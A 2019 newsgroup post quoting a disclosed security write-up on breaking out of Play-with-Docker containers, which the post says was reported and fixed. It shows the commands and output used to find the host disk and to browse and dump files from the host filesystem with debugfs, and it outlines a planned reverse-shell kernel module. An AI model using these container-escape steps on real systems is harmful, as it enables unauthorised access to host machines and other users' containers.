Rocksolid Light

Welcome to novaBBS (click a section below)

mail  files  register  newsreader  groups  login

Message-ID:  

Landru! Guide us! -- A Beta 3-oid, "The Return of the Archons", stardate 3157.4


computers / rocksolid.shared.security / docker and vms are not a safety measure

SubjectAuthor
o docker and vms are not a safety measure654643

1
docker and vms are not a safety measure

<153a3d7e0d58d3f25f838b41f8dccb73@def4>

  copy mid

https://novabbs.com/computers/article-flat.php?id=10&group=rocksolid.shared.security#10

  copy link   Newsgroups: rocksolid.shared.security
Path: i2pn2.org!rocksolid2!def5!POSTED.localhost!not-for-mail
From: 654...@anon.com (654643)
Newsgroups: rocksolid.shared.security
Message-ID: <153a3d7e0d58d3f25f838b41f8dccb73@def4>
Subject: docker and vms are not a safety measure
Date: Wed, 16 Jan 2019 18:45:52+0000
Organization: def5
In-Reply-To:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
 by: 654643 - Wed, 16 Jan 2019 18:45 UTC

as illustrated here again:

https://www.cyberark.com/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host/

Play-with-Docker (PWD), Docker’s playground website, allows beginners to run Docker commands in a matter of seconds. Built on a number of hosts with each running multiple student’s containers, it’s a great place to learn Docker. PWD provides the experience of having a free Alpine Linux virtual machine in a web browser where students can build and run Docker containers and experience Docker firsthand without having to first install and configure it.

This unique offering was warmly welcomed by DevOps practitioners with more than 100,000 total monthly site visits, where Docker tutorials, workshops and training are also available. The initiative was an effort originated by Marcos Nils and Jonathan Leibiusky, aided by the Docker community and sponsored by Docker.

CyberArk Labs set out to try and escape the mock container in an effort to run code on the Docker host.

The impact of container escape is similar to escape from a virtual machine, as both allow access to the underlying server. Running code on the PWD server would allow an attacker unabridged root access to the PWD infrastructure, on one hand, and to all the students’ containers on the other hand. Escaping a container may be regarded as the first step in an attack against an enterprise infrastructure, since many enterprises are running public-facing containers nowadays, which may lead the attackers into the enterprise network.

Our findings were reported to Docker and PWD maintainers, which subsequently fixed PWD.

This is our story[i].
Virtual Machine or Linux Containers

Containers and virtual machines (VM) both provide a way to isolate applications from the underlying host and other applications running on the same machine. This isolation is important for applications execution and crucial for security.

An important distinction between a Linux container and a VM is its relation to the Linux kernel. As image 1 shows, a VM is loading a new kernel for each instance; each VM runs not just a virtual copy of all the hardware (the Hypervisor), but also a full copy of a Linux kernel for each VM instance.

In contrast, all containers share the same kernel code. This is what makes containers so lightweight and easy to manipulate, but it is also a weak link in the Linux containers chain. In this blog post we attack that weak link.
Image 1: VMs vs Containers Virtualization Layers. Source: https://www.electronicdesign.com/dev-tools/what-s-difference-between-containers-and-virtual-machines


Know Thy Enemy

The first step when approaching a container is to chart its borders:

[node1] $ uname –a
Linux node1 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 Linux

The ‘uname’ command prints out the host’s kernel version, architecture, hostname and build date.

[node1] $ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.4.0-96-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro
console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300

This cmdline pseudo-file on the /proc filesystem tells us the kernel’s boot image and the root UUID. This UUID is mounted as the host’s root hard drive. The next step is locating the device behind this UUID:

[node1] $ findfs UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c
/dev/sda1

We can now try to mount this device inside the container and, if successful, access the host’s filesystem:

[node1] $ mkdir /mnt1
[node1] $ mount /dev/sda1 /mnt1
mount: /mnt1: cannot mount /dev/sda1 read-only.

Unfortunately, the sda1 device is read-only so we cannot mount it. This is probably accomplished using the PWD AppArmor profile.

The next thing we can do is dump the cpuinfo file in the proc fs:

[node1] $ cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2673 v4 @ 2.30GHz
stepping : 1
microcode : 0xffffffff
cpu MHz : 2294.670
cache size : 51200 KB
physical id : 0
siblings : 8
core id : 0
cpu cores : 4
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology eagerfpu pni pclmulqdq vmx ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch tpr_shadow vnmi ept vpid fsgsbase bmi1 hle avx2 smep bmi2 erms invpcid rtm rdseed adx smap xsaveopt
bugs :
bogomips : 4589.34
clflush size : 64
cache_alignment : 64
address sizes : 44 bits physical, 48 bits virtual
power management:

—- snip —-

processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2673 v4 @ 2.30GHz
.......

We kept studying the container environment and also found that the host’s underlying hardware is[ii]:

Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS 090007&amp;nbsp; 06/02/2017

There is one more thing to do before we decide on our next step, and that is to use debugfs.

Debugfs is an interactive file system debugger for ext2/3/4 file systems. It can read and write ext file systems designated by a device. Let’s try debugfs with the sda1 device:
[node1 $ debugfs /dev/sda1
debugfs 1.44.2 (14-May-2018)
debugfs:

Good! We’ve penetrated the host’s root file system on the sda1 device. By using standard Linux commands, such as ‘cd’ and ‘ls’ we can now look deeper into the host’s file system:

debugfs: ls
2 (12) . 2 (12) .. 11 (20) lost+found 12 (12) bin
181 (12) boot 193 (12) dev 282 (12) etc 2028 (12) home
6847 (20) initrd.img 2030 (12) lib 4214 (16) lib64
4216 (16) media 4217 (12) mnt 4218 (12) opt 4219 (12) proc
4220 (12) root 4223 (12) run 4226 (12) sbin 4451 (12) snap
4452 (12) srv 4453 (12) sys 4454 (12) tmp 4455 (12) usr
55481 (12) var 3695 (16) vmlinuz 3529 (12) .rnd 2684 (36) -
17685 (24) initrd.img.old 24035 (3696) vmlinuz.old

This seems to be the host’s root directory structure. The numbers before each entry are the inodes. For example, the root (..) corresponds to inode 2. The /etc directory has inode 282.

Armed with this information we can plan our next steps:

Plan A:

Our main goal is to run our code on the host of the container we are in. To do that we may attempt to load a Linux kernel module that manipulates the kernel to run our code.
To load a new kernel module we usually need to compile it with the exact same kernel source code, kernel configuration and toolset. We can’t achieve that on the PWD kernel[iii], so we turn to plan B.

Plan B:

Plan B is to use a module already loaded on the target kernel to help us build our own modules, which will be loadable on the PWD kernel.
Once we have the target module, we need to compile and load a first ‘probing’ kernel module. This module would use printk to dump the necessary information on the kernel logger to load a second, reverse shell module.
Running the second module on the target kernel would execute the necessary code to establish a reverse shell from the PWD host to our command and control center.

Sound complicated? It’s actually not that complicated if you are familiar with Linux kernel modules, but you can skip the technical parts and jump directly to the video if you prefer.


Stage 1: Obtain a Play–with-Docker Kernel Module

With the help of the debugfs application, we were able to easily roam the host’s filesystem. Pretty soon we found a kernel module with the minimum necessary requirements for our tactics to work: a module that uses the printk kernel function.

debugfs: cd /lib/modules
debugfs: ls
3017 (12) . 2030 (48) .. 262485 (24) 4.4.0-96-generic
524603 (28) 4.4.0-137-generic 2055675 (3984) 4.4.0-138-generic

This is a listing of the device’s /lib/modules directory structure. In red are the inodes of each file. This directory contains 3 different kernel versions. We need 4.4.0-96-generic.

debugfs: cd 4.4.0-96-generic/kernel/fs/ceph
debugfs: ls
1024182 (12) . 774089 (36) .. 1024183 (4048) ceph.ko

Next, extract the ceph.ko[iv], file, which is a kernel loaded module for the ceph software storage platform. Any other module on the host, which uses the printk function, is sufficient for our cause.

debugfs: dump &lt;1024183&gt; /tmp/ceph.ko

The dump debugfs command is actually extracting a file by its inode from the filesystem being debugged (the root filesystem) to the container’s local /tmp directory.

Now we can transfer this file to our workstation.


Stage 2: Create the ‘Probing’ Kernel Module:

Generally speaking, a module compiled using one kernel source code will not load on a kernel compiled with another source code. However, for relatively simple modules, a module can be loaded on a different kernel in three conditions:

The module is using the kernel’s matching vermagic. Vermagic is a string that identifies the version of the kernel it was compiled on.
Every function call or kernel structure used by the module (symbols in the Linux kernel’s jargon) should report a matching CRC to the kernel it is trying to load on.
The starting relocatable address of the module — the one that the kernel is executing — should be in line with the kernel’s programmed address.


Click here to read the complete article
1
server_pubkey.txt

rocksolid light 0.9.8
clearnet tor